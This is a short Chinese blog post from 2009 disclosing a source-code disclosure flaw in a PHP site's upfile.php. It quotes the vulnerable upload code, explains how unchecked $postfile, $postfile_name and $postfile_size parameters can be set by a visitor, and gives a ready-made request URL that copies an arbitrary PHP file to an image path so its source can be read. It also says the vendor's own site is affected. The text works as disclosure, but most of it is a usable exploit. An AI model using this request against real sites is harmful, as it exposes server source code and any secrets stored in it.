分类: 网络与安全
2009-01-16 22:43:56
漏洞发现者:xhming
漏洞文件是根目录的upfile.php这次不是上传漏洞,而是泄露源代码!!
if($postfile){
if( !ereg("^[0-9a-z_/]+$",$dir)||ereg("^/",$dir) ){
$dir="other";
}
$array[name]=is_array($postfile)?$_FILES[postfile][name]:$postfile_name;
$array[path]=$webdb[updir]."/".$dir;
$array[size]=is_array($postfile)?$_FILES[postfile][size]:$postfile_size;
$array[updateTable]=1;
$filename=upfile(is_array($postfile)?$_FILES[postfile][tmp_name]:$postfile,$array);
看到没有只要$postfile存在,并且不为数组我们就可以为$postfile,$postfile_name,$postfile_size付值
本地直接构造提交页面提交地址为http://www.xxx.com/upfile.php?postfile=biz/product.php&postfile_name=shop/images/default/logo.gif&postfile_size=333 //$postfile可以为任意php文件,提交成功有地址返回!,经测试官方也有此漏洞!